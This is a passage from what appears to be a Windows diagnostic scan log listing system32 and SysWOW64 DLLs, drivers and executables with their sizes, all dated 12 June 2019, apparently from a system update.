2019-06-12 07:00 - 003094528 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 002763312 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 002698552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 002584576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 002449456 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 002321408 _____ (The ICU Project) C:\WINDOWS\system32\icu.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 002178048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaclient.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 002117168 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 002081464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001954952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001944064 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001940952 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001893888 _____ (The ICU Project) C:\WINDOWS\SysWOW64\icu.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001884672 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001847808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsservices.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001830416 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpserverbase.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001784832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001754024 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2019-06-12 07:00 - 2019-06-12 07:00 - 001697792 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001657856 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001647584 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001562640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpserverbase.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001553408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 001537024 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001515008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaclient.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001509728 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 001505808 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpbase.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001478656 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpsharercom.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001473488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001422848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 001414144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001413704 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001395600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001366344 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2019-06-12 07:00 - 2019-06-12 07:00 - 001356800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001333248 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001283384 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2019-06-12 07:00 - 2019-06-12 07:00 - 001282560 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001282048 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsf3gip.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001258496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpsharercom.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001213456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpbase.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001182448 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 001159680 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001068856 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001065984 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001062912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 001062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001010176 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001007160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 001007104 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000939504 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000913408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000911360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000909736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000900608 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000888056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000879576 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000864768 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000861696 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000858112 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000824832 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000822072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000811192 _____ C:\WINDOWS\SysWOW64\locale.nls 2019-06-12 07:00 - 2019-06-12 07:00 - 000811192 _____ C:\WINDOWS\system32\locale.nls 2019-06-12 07:00 - 2019-06-12 07:00 - 000804880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000797112 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000784896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000773944 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000773168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000751256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000735232 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000727040 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000726328 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_StorageSense.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000722072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000705536 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000679368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000669496 _____ (Microsoft Corporation) C:\WINDOWS\system32\computecore.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000667272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000628616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000621568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000613904 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000612352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000594944 _____ (Microsoft Corporation) C:\WINDOWS\system32\XAudio2_9.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000592896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000589384 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000574976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XAudio2_9.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000562176 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv 2019-06-12 07:00 - 2019-06-12 07:00 - 000537088 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000537088 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000532992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.UserService.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000529072 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcryptprimitives.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000515896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000480768 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskcomp.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000466624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000462352 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000461824 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000457016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cldflt.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000451896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000423936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000422008 _____ (Microsoft Corporation) C:\WINDOWS\system32\SgrmEnclave_secure.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000420152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmicmiplugin.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000415808 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000415232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv 2019-06-12 07:00 - 2019-06-12 07:00 - 000404392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000401416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000386832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000381240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000379192 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskcomp.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000363624 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000358944 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsta.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\MbbCx.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000344576 _____ (Microsoft Corporation) C:\WINDOWS\system32\CapabilityAccessManager.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000338800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netbt.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000336896 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000321024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.FileExplorer.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000311296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FWPUCLNT.DLL 2019-06-12 07:00 - 2019-06-12 07:00 - 000295936 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000284536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000279624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winsta.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000274128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000269824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DesktopSwitcherDataModel.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000267728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\pku2u.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpnServiceDS.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\schtasks.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000226816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000226816 _____ (Microsoft Corporation) C:\WINDOWS\system32\CapabilityAccessManagerClient.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000224768 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE 2019-06-12 07:00 - 2019-06-12 07:00 - 000223248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelppm.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000220472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdigest.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000208184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\processr.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000205112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winquic.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000201256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdppm.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000199688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\amdk8.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000199184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000199184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000194176 _____ (Microsoft Corporation) C:\WINDOWS\system32\winquic.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schtasks.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000179512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000178192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000169472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatialAudioLicenseSrv.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000161848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wldp.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaproxystub.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000146744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecdd.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000146416 _____ (Microsoft Corporation) C:\WINDOWS\system32\profext.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\GraphicsCapture.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\luafv.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000139472 _____ (Microsoft Corporation) C:\WINDOWS\system32\userenv.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000134760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wldp.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000129024 _____ (Microsoft Corporation) C:\WINDOWS\system32\GameChatTranscription.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000124416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000120352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profext.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapistub.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mapi32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000116184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\userenv.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Taskbar.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000109568 _____ (Microsoft Corporation) C:\WINDOWS\system32\umpoext.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000107008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GraphicsCapture.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mapistub.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mapi32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000098816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GameChatTranscription.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000098816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000098304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS 2019-06-12 07:00 - 2019-06-12 07:00 - 000093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSReset.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompMgmtLauncher.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000088352 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000088064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApiSetHost.AppExecutionAlias.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000084280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhvr.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwm.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000069120 _____ (Microsoft Corporation) C:\WINDOWS\system32\UsoClient.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000066360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptdll.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ApiSetHost.AppExecutionAlias.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000062976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaproxystub.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\audioresourceregistrar.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000056008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptdll.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000055608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storufs.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys 2019-06-12 07:00 - 2019-06-12 07:00 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000037888 _____ C:\WINDOWS\system32\usocoreps.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthMini.SYS 2019-06-12 07:00 - 2019-06-12 07:00 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxssrv.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\FaxPrinterInstaller.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wci.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\fixmapi.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000016384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fixmapi.exe 2019-06-12 07:00 - 2019-06-12 07:00 - 000013824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KBDJPN.DLL 2019-06-12 07:00 - 2019-06-12 07:00 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimg32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimg32.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6r.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3r.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tier2punctuations.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6r.dll 2019-06-12 07:00 - 2019-06-12 07:00 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3r.dll 2019-06-12 06:58 